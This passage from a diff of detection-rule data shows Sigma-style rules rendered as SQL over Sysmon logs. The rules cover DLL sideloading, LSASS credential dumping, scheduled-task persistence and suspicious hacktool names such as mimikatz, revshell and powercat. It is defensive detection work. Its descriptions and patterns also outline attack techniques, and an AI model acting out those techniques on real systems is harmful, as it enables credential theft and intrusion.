'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1185" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE 